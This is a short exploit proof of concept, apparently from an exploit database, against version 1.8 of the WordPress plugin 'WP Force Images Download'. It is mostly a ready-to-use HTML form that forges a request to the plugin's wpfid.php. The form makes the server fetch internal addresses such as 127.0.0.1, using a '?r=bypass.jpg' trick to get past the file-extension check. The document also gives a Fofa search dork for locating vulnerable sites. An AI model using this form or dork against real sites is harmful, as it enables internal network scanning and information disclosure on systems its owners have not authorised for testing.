# Exploit Author : Etharus # Vulnerability : Cross Site Request Forgery to Server Side Request Forgery # Impact : internal ip disclosure , file extension bypass, internal port scan. # Product Vendor : Nazakat Ali # Version Tested : 1.8 # Date : 14/07/2023 # Fofa Dork : "/wp-content/plugins/wp-force-images-download/" <form id="wpfid-form" method="post" action="https://target/wp-content/plugins/wp-force-images-download/wpfid.php"> <input name="wpfid_pic_url" type="text" placeholder="[TARGET URL] : http://127.0.0.1/?r=bypass.jpg"> <br><input name="new_name" type="hidden" value=""> <button style="background: gray; --darkreader-inline-bgcolor: #60686c; --darkreader-inline-bgimage: none;" class="d-btn" id="wpfid_button" type="submit" title="Download" data-darkreader-inline-bgcolor="" data-darkreader-inline-bgimage=""> <span style="line-height: 30px;" class="wpfid_title">Download</span> </button> </form>